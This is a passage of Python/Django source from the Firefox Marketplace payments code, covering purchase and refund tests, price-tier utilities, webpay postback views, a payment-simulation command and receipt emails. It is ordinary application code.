.exists())
def type(self):
return self.addon.addonpurchase_set.get(user=self.user).type
class TestContribution(ContributionMixin, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999', 'user_admin')
def test_purchase(self):
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
def test_refund(self):
self.create(amo.CONTRIB_REFUND)
assert not self.purchased()
def test_purchase_and_refund(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
assert not self.purchased()
eq_(self.type(), amo.CONTRIB_REFUND)
def test_refund_and_purchase(self):
# This refund does nothing, there was nothing there to refund.
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
eq_(self.type(), amo.CONTRIB_PURCHASE)
def test_really_cant_decide(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
self.create(amo.CONTRIB_PURCHASE)
assert self.purchased()
eq_(self.type(), amo.CONTRIB_PURCHASE)
def test_purchase_and_chargeback(self):
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_CHARGEBACK)
assert not self.purchased()
eq_(self.type(), amo.CONTRIB_CHARGEBACK)
def test_other_user(self):
other = UserProfile.objects.get(email='[email protected]')
Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
addon=self.addon, user=other)
self.create(amo.CONTRIB_PURCHASE)
self.create(amo.CONTRIB_REFUND)
eq_(self.addon.addonpurchase_set.filter(user=other).count(), 1)
def set_role(self, role):
AddonUser.objects.create(addon=self.addon, user=self.user, role=role)
self.create(amo.CONTRIB_PURCHASE)
installed = self.user.installed_set.filter(addon=self.addon)
eq_(installed.count(), 1)
eq_(installed[0].install_type, apps.INSTALL_TYPE_DEVELOPER)
def test_user_dev(self):
self.set_role(amo.AUTHOR_ROLE_DEV)
def test_user_owner(self):
self.set_role(amo.AUTHOR_ROLE_OWNER)
def test_user_installed_dev(self):
self.create(amo.CONTRIB_PURCHASE)
eq_(self.user.installed_set.filter(addon=self.addon).count(), 1)
def test_user_not_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(list(self.user.purchase_ids()), [])
def test_user_purchased(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.addon.addonpurchase_set.create(user=self.user)
eq_(list(self.user.purchase_ids()), [337141L])
def test_user_refunded(self):
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.addon.addonpurchase_set.create(user=self.user,
type=amo.CONTRIB_REFUND)
eq_(list(self.user.purchase_ids()), [])
def test_user_cache(self):
# Tests that the purchase_ids caches.
self.addon.update(premium_type=amo.ADDON_PREMIUM)
eq_(list(self.user.purchase_ids()), [])
self.create(amo.CONTRIB_PURCHASE)
eq_(list(self.user.purchase_ids()), [337141L])
# This caches.
eq_(list(self.user.purchase_ids()), [337141L])
self.create(amo.CONTRIB_REFUND)
eq_(list(self.user.purchase_ids()), [])
class TestRefundContribution(ContributionMixin, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999', 'user_admin')
def setUp(self):
super(TestRefundContribution, self).setUp()
self.contribution = self.create(amo.CONTRIB_PURCHASE)
def do_refund(self, expected, status, refund_reason=None,
rejection_reason=None):
"""Checks that a refund is enqueued and contains the correct values."""
self.contribution.enqueue_refund(status, self.user,
refund_reason=refund_reason,
rejection_reason=rejection_reason)
expected.update(contribution=self.contribution, status=status)
eq_(Refund.objects.count(), 1)
refund = Refund.objects.filter(**expected)
eq_(refund.exists(), True)
return refund[0]
def test_pending(self):
reason = 'this is bloody bullocks, mate'
expected = dict(refund_reason=reason,
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
self.assertCloseToNow(refund.requested)
def test_pending_to_approved(self):
reason = 'this is bloody bullocks, mate'
expected = dict(refund_reason=reason,
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
self.assertCloseToNow(refund.requested)
# Change `requested` date to some date in the past.
requested_date = refund.requested - datetime.timedelta(hours=1)
refund.requested = requested_date
refund.save()
expected = dict(refund_reason=reason,
requested__isnull=False,
approved__isnull=False,
declined=None)
refund = self.do_refund(expected, amo.REFUND_APPROVED)
eq_(refund.requested, requested_date,
'Expected date `requested` to remain unchanged.')
self.assertCloseToNow(refund.approved)
def test_approved_instant(self):
expected = dict(refund_reason='',
requested__isnull=False,
approved__isnull=False,
declined=None)
refund = self.do_refund(expected, amo.REFUND_APPROVED_INSTANT)
self.assertCloseToNow(refund.requested)
self.assertCloseToNow(refund.approved)
def test_pending_to_declined(self):
refund_reason = 'please, bro'
rejection_reason = 'sorry, brah'
expected = dict(refund_reason=refund_reason,
rejection_reason='',
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, refund_reason)
self.assertCloseToNow(refund.requested)
requested_date = refund.requested - datetime.timedelta(hours=1)
refund.requested = requested_date
refund.save()
expected = dict(refund_reason=refund_reason,
rejection_reason=rejection_reason,
requested__isnull=False,
approved=None,
declined__isnull=False)
refund = self.do_refund(expected, amo.REFUND_DECLINED,
rejection_reason=rejection_reason)
eq_(refund.requested, requested_date,
'Expected date `requested` to remain unchanged.')
self.assertCloseToNow(refund.declined)
class TestRefundManager(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999', 'user_admin')
def setUp(self):
self.addon = Webapp.objects.get(id=337141)
self.user = UserProfile.objects.get(id=999)
self.expected = {}
for status in amo.REFUND_STATUSES.keys():
c = Contribution.objects.create(addon=self.addon, user=self.user,
type=amo.CONTRIB_PURCHASE)
self.expected[status] = Refund.objects.create(contribution=c,
status=status,
user=self.user)
def test_all(self):
eq_(sorted(Refund.objects.values_list('id', flat=True)),
sorted(e.id for e in self.expected.values()))
def test_pending(self):
eq_(list(Refund.objects.pending(self.addon)),
[self.expected[amo.REFUND_PENDING]])
def test_approved(self):
eq_(list(Refund.objects.approved(self.addon)),
[self.expected[amo.REFUND_APPROVED]])
def test_instant(self):
eq_(list(Refund.objects.instant(self.addon)),
[self.expected[amo.REFUND_APPROVED_INSTANT]])
def test_declined(self):
eq_(list(Refund.objects.declined(self.addon)),
[self.expected[amo.REFUND_DECLINED]])
def test_by_addon(self):
other = Webapp.objects.create()
c = Contribution.objects.create(addon=other, user=self.user,
type=amo.CONTRIB_PURCHASE)
ref = Refund.objects.create(contribution=c, status=amo.REFUND_DECLINED,
user=self.user)
declined = Refund.objects.filter(status=amo.REFUND_DECLINED)
eq_(sorted(r.id for r in declined),
sorted(r.id for r in [self.expected[amo.REFUND_DECLINED], ref]))
eq_(sorted(r.id for r in Refund.objects.by_addon(addon=self.addon)),
sorted(r.id for r in self.expected.values()))
eq_(list(Refund.objects.by_addon(addon=other)), [ref])
########NEW FILE########
__FILENAME__ = test_utils
from StringIO import StringIO
from nose.tools import eq_
import amo.tests
from mkt.prices.models import Price, PriceCurrency
from mkt.prices.utils import update, update_from_csv
tiers = [
{'USD': '0.99', 'BRL': '1.99'},
# This row should be ignored, no tier of value 3.
{'USD': '3.00'},
# This row should be ignored, not US tier.
{'CAD': '10'}
]
csv = StringIO("""USD\tCAD\tBRL\n0.99\t1.99\t1.00""")
class TestUpdate(amo.tests.TestCase):
def setUp(self):
self.tier = Price.objects.create(name='1', price='0.99')
def test_create(self):
update(tiers)
eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')
assert not PriceCurrency.objects.filter(currency='CAD').exists()
def test_update(self):
PriceCurrency.objects.create(currency='BRL', tier=self.tier, price='2')
update(tiers)
eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')
def test_csv(self):
update_from_csv(csv)
assert PriceCurrency.objects.filter(currency='CAD').exists()
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework import routers
from mkt.prices.views import PricesViewSet
api = routers.SimpleRouter()
api.register(r'prices', PricesViewSet)
urlpatterns = patterns(
'',
url(r'^', include(api.urls)),
)
########NEW FILE########
__FILENAME__ = utils
import csv
from decimal import Decimal
from mkt.prices.models import Price, PriceCurrency
def update(tiers):
"""
Updates the prices and price currency objects based on the tiers.
Tiers should be a list containing a dictionary of currency / value pairs.
The value of US is required so that we can look up the price tier. If the
price tier for US isn't found, we skip whole tier. If the currency isn't
found but the tier is, we create the currency.
This is intended to be called via a migration or other command.
"""
output = []
for row in tiers:
us = row.get('USD')
if not us:
output.append('No USD in row, skipped')
continue
try:
tier = Price.objects.get(price=Decimal(us))
except Price.DoesNotExist:
output.append('Tier not found, skipping: %s' % us)
continue
for currency, value in row.iteritems():
if currency == 'USD':
continue
try:
curr = PriceCurrency.objects.get(tier=tier, currency=currency)
except PriceCurrency.DoesNotExist:
curr = PriceCurrency(tier=tier, currency=currency)
curr.price = Decimal(value)
curr.save()
output.append('Currency updated: %s, %s, tier %s' %
(currency, value, us))
return output
def update_from_csv(handle):
reader = csv.reader(handle, delimiter='\t')
headers = []
output = []
for row in reader:
if not headers:
headers = row
continue
output.append(dict(zip(headers, row)))
return update(output)
########NEW FILE########
__FILENAME__ = views
import django_filters
from rest_framework.mixins import RetrieveModelMixin, ListModelMixin
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import GenericViewSet
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.prices.models import Price
from mkt.prices.serializers import PriceSerializer
from mkt.api.authentication import RestAnonymousAuthentication
class PriceFilter(django_filters.FilterSet):
pricePoint = django_filters.CharFilter(name="name")
class Meta:
model = Price
fields = ['pricePoint']
class PricesViewSet(MarketplaceView, CORSMixin, ListModelMixin,
RetrieveModelMixin, GenericViewSet):
queryset = Price.objects.filter(active=True).order_by('price')
serializer_class = PriceSerializer
cors_allowed_methods = ['get']
authentication_classes = [RestAnonymousAuthentication]
permission_classes = [AllowAny]
filter_class = PriceFilter
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.core.exceptions import PermissionDenied
import commonware.log
log = commonware.log.getLogger('mkt.purchase')
def can_become_premium(f):
"""Check that the webapp can become premium."""
@functools.wraps(f)
def wrapper(request, addon_id, addon, *args, **kw):
if not addon.can_become_premium():
log.info('Cannot become premium: %d' % addon.pk)
raise PermissionDenied
return f(request, addon_id, addon, *args, **kw)
return wrapper
def can_be_purchased(f):
"""
Check if it can be purchased, returns False if not premium.
Must be called after the addon_view decorator.
"""
@functools.wraps(f)
def wrapper(request, addon, *args, **kw):
if not addon.can_be_purchased():
log.info('Cannot be purchased: %d' % addon.pk)
raise PermissionDenied
return f(request, addon, *args, **kw)
return wrapper
def has_purchased(f):
"""
If the addon is premium, require a purchase.
Must be called after addon_view decorator.
"""
@functools.wraps(f)
def wrapper(request, addon, *args, **kw):
if addon.is_premium() and not addon.has_purchased(request.amo_user):
log.info('Not purchased: %d' % addon.pk)
raise PermissionDenied
return f(request, addon, *args, **kw)
return wrapper
########NEW FILE########
__FILENAME__ = post_bluevia_payment
import calendar
from optparse import make_option
import time
from urllib import urlencode
from django.core.management.base import BaseCommand
import jwt
import requests
class Command(BaseCommand):
help = 'Simulate a BlueVia postback to mark a payment as complete.'
option_list = BaseCommand.option_list + (
make_option('--trans-id', action='store',
help='BlueVia transaction ID', default='1234'),
make_option('--secret', action='store',
help='Marketplace secret for signature verification'),
make_option('--contrib', action='store',
help='Contribution UUID'),
make_option('--addon', action='store',
help='ID of addon that was purchased'),
make_option('--url', action='store',
help='Postback URL. Default: %default',
default='http://localhost:8001/services/bluevia/postback'),
)
def handle(self, *args, **options):
assert 'contrib' in options, 'require --contrib'
assert 'addon' in options, 'require --addon'
issued_at = calendar.timegm(time.gmtime())
prod_data = urlencode({'contrib_uuid': options['contrib'],
'addon_id': options['addon']})
purchase = {'iss': 'tu.com',
'aud': 'marketplace.mozilla.org',
'typ': 'tu.com/payments/inapp/v1',
'iat': issued_at,
'exp': issued_at + 3600, # expires in 1 hour
'request': {
'name': 'Simulated Product',
'description': 'Simulated Product Description',
'price': '0.99',
'currencyCode': 'USD',
'productData': prod_data},
'response': {
'transactionID': options['trans_id']
}}
purchase_jwt = jwt.encode(purchase, options['secret'])
print 'posting JWT to %s' % options['url']
res = requests.post(options['url'], purchase_jwt, timeout=5)
res.raise_for_status()
print 'OK'
########NEW FILE########
__FILENAME__ = tasks
import logging
from celeryutils import task
from jingo.helpers import datetime
from tower import ugettext as _
from amo.helpers import absolutify
from amo.utils import get_locale_from_lang, send_html_mail_jinja
from stats.models import Contribution
log = logging.getLogger('z.purchase.webpay')
notify_kw = dict(default_retry_delay=15, # seconds
max_tries=5)
@task
def send_purchase_receipt(contrib_id, **kw):
"""
Sends an email to the purchaser of the app.
"""
contrib = Contribution.objects.get(pk=contrib_id)
with contrib.user.activate_lang():
addon = contrib.addon
version = addon.current_version or addon.latest_version
# L10n: {0} is the app name.
subject = _('Receipt for {0}').format(contrib.addon.name)
data = {
'app_name': addon.name,
'developer_name': version.developer_name if version else '',
'price': contrib.get_amount_locale(get_locale_from_lang(
contrib.source_locale)),
'date': datetime(contrib.created.date()),
'purchaser_email': contrib.user.email,
#'purchaser_phone': '', # TODO: See bug 894614.
#'purchaser_last_four': '',
'transaction_id': contrib.uuid,
'purchases_url': absolutify('/purchases'),
'support_url': addon.support_url,
'terms_of_service_url': absolutify('/terms-of-use'),
}
log.info('Sending email about purchase: %s' % contrib_id)
text_template = 'purchase/receipt.ltxt'
html_template = 'purchase/receipt.html'
send_html_mail_jinja(subject, html_template, text_template, data,
recipient_list=[contrib.user.email])
########NEW FILE########
__FILENAME__ = test_webpay
import calendar
import json
import time
from decimal import Decimal
from django.conf import settings
from django.core.urlresolvers import reverse
import fudge
import jwt
import mock
from mock import ANY
from mozpay.exc import RequestExpired
from nose.tools import eq_, raises
import amo
from mkt.api.exceptions import AlreadyPurchased
from mkt.prices.models import AddonPurchase
from stats.models import Contribution
from utils import PurchaseTest
class TestWebAppPurchase(PurchaseTest):
def setUp(self):
super(TestWebAppPurchase, self).setUp()
self.create_flag(name='solitude-payments')
self.prepare_pay = reverse('webpay.prepare_pay',
kwargs={'app_slug': self.addon.app_slug})
def _req(self, method, url):
req = getattr(self.client, method)
resp = req(url)
eq_(resp.status_code, 200)
eq_(resp['content-type'], 'application/json')
return json.loads(resp.content)
def get(self, url, **kw):
return self._req('get', url, **kw)
def post(self, url, **kw):
return self._req('post', url, **kw)
def test_pay_status(self):
uuid = '<returned from prepare-pay>'
contribution = Contribution.objects.create(addon_id=self.addon.id,
amount=self.price.price,
uuid=uuid,
type=amo.CONTRIB_PENDING,
user=self.user)
data = self.get(reverse('webpay.pay_status',
args=[self.addon.app_slug, uuid]))
eq_(data['status'], 'incomplete')
contribution.update(type=amo.CONTRIB_PURCHASE)
data = self.get(reverse('webpay.pay_status',
args=[self.addon.app_slug, uuid]))
eq_(data['status'], 'complete')
def test_status_for_purchases_only(self):
uuid = '<returned from prepare-pay>'
Contribution.objects.create(addon_id=self.addon.id,
amount=self.price.price,
uuid=uuid,
type=amo.CONTRIB_PURCHASE,
user=self.user)
self.client.logout()
assert self.client.login(username='[email protected]',
password='password')
data = self.get(reverse('webpay.pay_status',
args=[self.addon.app_slug, uuid]))
eq_(data['status'], 'incomplete')
def test_pay_status_for_unknown_contrib(self):
data = self.get(reverse('webpay.pay_status',
args=[self.addon.app_slug, '<garbage>']))
eq_(data['status'], 'incomplete')
def test_strip_html(self):
self.addon.description = 'Some <a href="http://soso.com">site</a>'
self.addon.save()
data = self.post(self.prepare_pay)
data = jwt.decode(data['webpayJWT'].encode('ascii'), verify=False)
req = data['request']
eq_(req['description'], 'Some site')
def test_status_for_already_purchased(self):
AddonPurchase.objects.create(addon=self.addon,
user=self.user,
type=amo.CONTRIB_PURCHASE)
with self.assertRaises(AlreadyPurchased):
self.client.post(self.prepare_pay)
def test_require_login(self):
self.client.logout()
resp = self.client.post(self.prepare_pay)
self.assertLoginRequired(resp)
@mock.patch.object(settings, 'SOLITUDE_HOSTS', ['host'])
@mock.patch('mkt.purchase.webpay.tasks')
class TestPostback(PurchaseTest):
def setUp(self):
super(TestPostback, self).setUp()
self.client.logout()
self.contrib = Contribution.objects.create(
addon_id=self.addon.id,
amount=self.price.price,
uuid='<some uuid>',
type=amo.CONTRIB_PENDING,
user=self.user
)
self.webpay_dev_id = '<stored in solitude>'
self.webpay_dev_secret = '<stored in solitude>'
def post(self, req=None):
if not req:
req = self.jwt()
return self.client.post(reverse('webpay.postback'),
data={'notice': req})
def jwt_dict(self, expiry=3600, issued_at=None, contrib_uuid=None):
if not issued_at:
issued_at = calendar.timegm(time.gmtime())
if not contrib_uuid:
contrib_uuid = self.contrib.uuid
return {
'iss': 'mozilla',
'aud': self.webpay_dev_id,
'typ': 'mozilla/payments/inapp/v1',
'iat': issued_at,
'exp': issued_at + expiry,
'request': {
'name': 'Some App',
'description': 'fantastic app',
'pricePoint': '1',
'currencyCode': 'USD',
'postbackURL': '/postback',
'chargebackURL': '/chargeback',
'productData': 'contrib_uuid=%s' % contrib_uuid
},
'response': {
'transactionID': '<webpay-trans-id>',
'price': {'amount': '10.99', 'currency': 'BRL'}
},
}
def jwt(self, req=None, **kw):
if not req:
req = self.jwt_dict(**kw)
return jwt.encode(req, self.webpay_dev_secret)
@mock.patch('lib.crypto.webpay.jwt.decode')
def test_valid(self, decode, tasks):
jwt_dict = self.jwt_dict()
jwt_encoded = self.jwt(req=jwt_dict)
decode.return_value = jwt_dict
resp = self.post(req=jwt_encoded)
decode.assert_called_with(jwt_encoded, ANY)
eq_(resp.status_code, 200)
eq_(resp.content, '<webpay-trans-id>')
cn = Contribution.objects.get(pk=self.contrib.pk)
eq_(cn.type, amo.CONTRIB_PURCHASE)
eq_(cn.transaction_id, '<webpay-trans-id>')
eq_(cn.amount, Decimal('10.99'))
eq_(cn.currency, 'BRL')
tasks.send_purchase_receipt.delay.assert_called_with(cn.pk)
@mock.patch('lib.crypto.webpay.jwt.decode')
def test_valid_duplicate(self, decode, tasks):
jwt_dict = self.jwt_dict()
jwt_encoded = self.jwt(req=jwt_dict)
decode.return_value = jwt_dict
self.contrib.update(type=amo.CONTRIB_PURCHASE,
transaction_id='<webpay-trans-id>')
resp = self.post(req=jwt_encoded)
eq_(resp.status_code, 200)
eq_(resp.content, '<webpay-trans-id>')
assert not tasks.send_purchase_receipt.delay.called
@mock.patch('lib.crypto.webpay.jwt.decode')
def test_invalid_duplicate(self, decode, tasks):
jwt_dict = self.jwt_dict()
jwt_dict['response']['transactionID'] = '<some-other-trans-id>'
jwt_encoded = self.jwt(req=jwt_dict)
decode.return_value = jwt_dict
self.contrib.update(type=amo.CONTRIB_PURCHASE,
transaction_id='<webpay-trans-id>')
with self.assertRaises(LookupError):
self.post(req=jwt_encoded)
assert not tasks.send_purchase_receipt.delay.called
def test_invalid(self, tasks):
resp = self.post()
eq_(resp.status_code, 400)
cn = Contribution.objects.get(pk=self.contrib.pk)
eq_(cn.type, amo.CONTRIB_PENDING)
def test_empty_notice(self, tasks):
resp = self.client.post(reverse('webpay.postback'), data={})
eq_(resp.status_code, 400)
@raises(RequestExpired)
@fudge.patch('lib.crypto.webpay.jwt.decode')
def test_invalid_claim(self, tasks, decode):
iat = calendar.timegm(time.gmtime()) - 3601 # too old
decode.expects_call().returns(self.jwt_dict(issued_at=iat))
self.post()
@raises(LookupError)
@fudge.patch('mkt.purchase.webpay.parse_from_webpay')
def test_unknown_contrib(self, tasks, parse_from_webpay):
example = self.jwt_dict()
example['request']['productData'] = 'contrib_uuid=<bogus>'
parse_from_webpay.expects_call().returns(example)
self.post()
########NEW FILE########
__FILENAME__ = test_webpay_tasks
import uuid
from django.core import mail
from mock import patch
from nose.tools import eq_, ok_
import amo
from stats.models import Contribution
from mkt.purchase import tasks as tasks
from utils import PurchaseTest
class TestReceiptEmail(PurchaseTest):
def setUp(self):
super(TestReceiptEmail, self).setUp()
self.contrib = Contribution.objects.create(addon_id=self.addon.id,
amount=self.price.price,
uuid=str(uuid.uuid4()),
type=amo.CONTRIB_PURCHASE,
user=self.user,
source_locale='en-us')
def test_send(self):
tasks.send_purchase_receipt(self.contrib.pk)
eq_(len(mail.outbox), 1)
def test_localized_send(self):
self.contrib.user.lang = 'es'
self.contrib.user.save()
tasks.send_purchase_receipt(self.contrib.pk)
assert 'Precio' in mail.outbox[0].body
assert 'Algo Algo' in mail.outbox[0].body
@patch('mkt.purchase.tasks.send_html_mail_jinja')
def test_data(self, send_mail_jinja):
with self.settings(SITE_URL='http://f.com'):
tasks.send_purchase_receipt(self.contrib.pk)
args = send_mail_jinja.call_args
data = args[0][3]
eq_(args[1]['recipient_list'], [self.user.email])
eq_(data['app_name'], self.addon.name)
eq_(data['developer_name'], self.addon.current_version.developer_name)
eq_(data['price'], self.contrib.get_amount_locale('en_US'))
ok_(data['purchases_url'].startswith('http://f.com'))
########NEW FILE########
__FILENAME__ = utils
from decimal import Decimal
import mock
import amo.tests
from addons.models import Addon
from mkt.inapp.models import InAppProduct
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.site.fixtures import fixture
from mkt.prices.models import AddonPremium, Price, PriceCurrency
from users.models import UserProfile
class PurchaseTest(amo.tests.TestCase):
fixtures = fixture('prices', 'user_admin', 'user_999', 'webapp_337141')
def setUp(self):
self.setup_base()
assert self.client.login(username='[email protected]',
password='password')
self.user = UserProfile.objects.get(email='[email protected]')
self.brl = PriceCurrency.objects.create(currency='BRL',
price=Decimal('0.5'),
tier_id=1)
self.setup_package()
self.setup_mock_generic_product()
self.setup_public_id()
def setup_base(self):
self.addon = Addon.objects.get(pk=337141)
self.addon.update(premium_type=amo.ADDON_PREMIUM)
self.price = Price.objects.get(pk=1)
AddonPremium.objects.create(addon=self.addon, price=self.price)
# Refetch addon from the database to populate addon.premium field.
self.addon = Addon.objects.get(pk=self.addon.pk)
def setup_package(self):
self.seller = SolitudeSeller.objects.create(
resource_uri='/path/to/sel', uuid='seller-id', user=self.user)
self.account = PaymentAccount.objects.create(
user=self.user, uri='asdf', name='test', inactive=False,
solitude_seller=self.seller, account_id=123)
AddonPaymentAccount.objects.create(
addon=self.addon, account_uri='foo',
payment_account=self.account, product_uri='bpruri')
def setup_mock_generic_product(self):
patched_product = mock.patch(
'mkt.developers.providers.Provider.generic')
self.mock_product = patched_product.start()
self.addCleanup(patched_product.stop)
def setup_public_id(self):
self.public_id = 'public-id-set-in-devhub'
self.addon.update(solitude_public_id=self.public_id)
class InAppPurchaseTest(PurchaseTest):
def setup_base(self):
super(InAppPurchaseTest, self).setup_base()
self.inapp = InAppProduct.objects.create(
logo_url='logo.png', name='Inapp Object', price=self.price,
webapp=self.addon)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from . import webpay
# These URLs are attached to /services
webpay_services_patterns = patterns(
'',
url('^postback$', webpay.postback, name='webpay.postback'),
url('^chargeback$', webpay.chargeback, name='webpay.chargeback'),
)
# These URLs get attached to the app details URLs.
app_purchase_patterns = patterns(
'',
url('^webpay/prepare_pay$', webpay.prepare_pay,
name='webpay.prepare_pay'),
url('^webpay/pay_status/(?P<contrib_uuid>[^/]+)$', webpay.pay_status,
name='webpay.pay_status'),
)
urlpatterns = patterns(
'',
# TODO: Port these views.
#url('^thanks/$', views.purchase_thanks, name='purchase.thanks'),
#url('^error/$', views.purchase_error, name='purchase.error'),
('', include(app_purchase_patterns)),
)
########NEW FILE########
__FILENAME__ = webpay
import sys
import urlparse
import uuid
from decimal import Decimal
from django import http
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from addons.decorators import addon_view_factory
import amo
from amo.decorators import json_view, login_required, post_required, write
from lib.cef_loggers import app_pay_cef
from lib.crypto.webpay import InvalidSender, parse_from_webpay
from mkt.api.exceptions import AlreadyPurchased
from mkt.purchase.decorators import can_be_purchased
from mkt.webapps.models import Webapp
from mkt.webpay.webpay_jwt import get_product_jwt, WebAppProduct
from stats.models import Contribution
from . import tasks
log = commonware.log.getLogger('z.purchase')
addon_view = addon_view_factory(qs=Webapp.objects.valid)
@login_required
@addon_view
@write
@post_required
@json_view
@can_be_purchased
def prepare_pay(request, addon):
if addon.is_premium() and addon.has_purchased(request.amo_user):
log.info('Already purchased: %d' % addon.pk)
raise AlreadyPurchased
app_pay_cef.log(request, 'Preparing JWT', 'preparing_jwt',
'Preparing JWT for: %s' % (addon.pk), severity=3)
log.debug('Starting purchase of app: {0} by user: {1}'.format(
addon.pk, request.amo_user))
contribution = Contribution.objects.create(
addon_id=addon.pk,
amount=addon.get_price(region=request.REGION.id),
paykey=None,
price_tier=addon.premium.price,
source=request.REQUEST.get('src', ''),
source_locale=request.LANG,
type=amo.CONTRIB_PENDING,
user=request.amo_user,
uuid=str(uuid.uuid4()),
)
log.debug('Storing contrib for uuid: {0}'.format(contribution.uuid))
return get_product_jwt(WebAppProduct(addon), contribution)
@login_required
@addon_view
@write
@json_view
def pay_status(request, addon, contrib_uuid):
"""
Return JSON dict of {status: complete|incomplete}.
The status of the payment is only complete when it exists by uuid,
was purchased by the logged in user, and has been marked paid by the
JWT postback. After that the UI is free to call app/purchase/record
to generate a receipt.
"""
au = request.amo_user
qs = Contribution.objects.filter(uuid=contrib_uuid,
addon__addonpurchase__user=au,
type=amo.CONTRIB_PURCHASE)
return {'status': 'complete' if qs.exists() else 'incomplete'}
@csrf_exempt
@write
@post_required
def postback(request):
"""Verify signature and set contribution to paid."""
signed_jwt = request.POST.get('notice', '')
try:
data = parse_from_webpay(signed_jwt, request.META.get('REMOTE_ADDR'))
except InvalidSender, exc:
app_pay_cef.log(request, 'Unknown app', 'invalid_postback',
'Ignoring invalid JWT %r: %s' % (signed_jwt, exc),
severity=4)
return http.HttpResponseBadRequest()
pd = urlparse.parse_qs(data['request']['productData'])
contrib_uuid = pd['contrib_uuid'][0]
try:
contrib = Contribution.objects.get(uuid=contrib_uuid)
except Contribution.DoesNotExist:
etype, val, tb = sys.exc_info()
raise LookupError('JWT (iss:%s, aud:%s) for trans_id %s '
'links to contrib %s which doesn\'t exist'
% (data['iss'], data['aud'],
data['response']['transactionID'],
contrib_uuid)), None, tb
trans_id = data['response']['transactionID']
if contrib.transaction_id is not None:
if contrib.transaction_id == trans_id:
app_pay_cef.log(request, 'Repeat postback', 'repeat_postback',
'Postback sent again for: %s' % (contrib.addon.pk),
severity=4)
return http.HttpResponse(trans_id)
else:
app_pay_cef.log(request, 'Repeat postback with new trans_id',
'repeat_postback_new_trans_id',
'Postback sent again for: %s, but with new '
'trans_id: %s' % (contrib.addon.pk, trans_id),
severity=7)
raise LookupError('JWT (iss:%s, aud:%s) for trans_id %s is for '
'contrib %s that is already paid and has '
'existing differnet trans_id: %s'
% (data['iss'], data['aud'],
data['response']['transactionID'],
contrib_uuid, contrib.transaction_id))
log.info('webpay postback: fulfilling purchase for contrib %s with '
'transaction %s' % (contrib, trans_id))
app_pay_cef.log(request, 'Purchase complete', 'purchase_complete',
'Purchase complete for: %s' % (contrib.addon.pk),
severity=3)
contrib.update(transaction_id=trans_id, type=amo.CONTRIB_PURCHASE,
amount=Decimal(data['response']['price']['amount']),
currency=data['response']['price']['currency'])
tasks.send_purchase_receipt.delay(contrib.pk)
return http.HttpResponse(trans_id)
@csrf_exempt
@write
@post_required
def chargeback(request):
"""
Verify signature from and create a refund contribution tied
to the original transaction.
"""
raise NotImplementedError
########NEW FILE########
__FILENAME__ = cron
import datetime
from django.conf import settings
import commonware.log
import cronjobs
import amo
from amo.utils import send_mail_jinja
from reviews.models import Review
cron_log = commonware.log.getLogger('mkt.ratings.cron')
@cronjobs.register
def email_daily_ratings():
"""
Does email for yesterday's ratings (right after the day has passed).
Sends an email containing all reviews for that day for certain app.
"""
dt = datetime.datetime.today() - datetime.timedelta(1)
yesterday = datetime.datetime(dt.year, dt.month, dt.day, 0, 0, 0)
today = yesterday + datetime.timedelta(1)
pretty_date = '%04d-%02d-%02d' % (dt.year, dt.month, dt.day)
yesterday_reviews = Review.objects.filter(created__gte=yesterday,
created__lt=today,
addon__type=amo.ADDON_WEBAPP)
# For each app in yesterday's set of reviews, gather reviews and email out.
apps = set(review.addon for review in yesterday_reviews)
for app in apps:
# Email all reviews in one email for current app in loop.
author_emails = app.authors.values_list('email', flat=True)
subject = 'Firefox Marketplace reviews for %s on %s' % (app.name,
pretty_date)
context = {'reviews': (yesterday_reviews.filter(addon=app).
order_by('-created')),
'base_url': settings.SITE_URL,
'pretty_date': pretty_date}
send_mail_jinja(subject, 'ratings/emails/daily_digest.html',
context, recipient_list=author_emails,
perm_setting='app_new_review', async=True)
########NEW FILE########
__FILENAME__ = forms
from django import forms
from django.forms.models import modelformset_factory
import happyforms
from quieter_formset.formset import BaseModelFormSet
from tower import ugettext_lazy as _lazy
import amo
from editors.models import ReviewerScore
from reviews.models import Review
from mkt.ratings import (REVIEW_MODERATE_DELETE, REVIEW_MODERATE_KEEP,
REVIEW_MODERATE_SKIP)
from mkt.ratings.helpers import user_can_delete_review
class BaseReviewFlagFormSet(BaseModelFormSet):
def __init__(self, *args, **kwargs):
self.form = ModerateReviewFlagForm
self.request = kwargs.pop('request', None)
super(BaseReviewFlagFormSet, self).__init__(*args, **kwargs)
def save(self):
for form in self.forms:
if form.cleaned_data and user_can_delete_review(self.request,
form.instance):
action = int(form.cleaned_data['action'])
is_flagged = (form.instance.reviewflag_set.count() > 0)
if action != REVIEW_MODERATE_SKIP: # Delete flags.
for flag in form.instance.reviewflag_set.all():
flag.delete()
review = form.instance
addon = review.addon
if action == REVIEW_MODERATE_DELETE:
review_addon = review.addon
review_id = review.id
review.delete()
amo.log(amo.LOG.DELETE_REVIEW, review_addon, review_id,
details=dict(title=unicode(review.title),
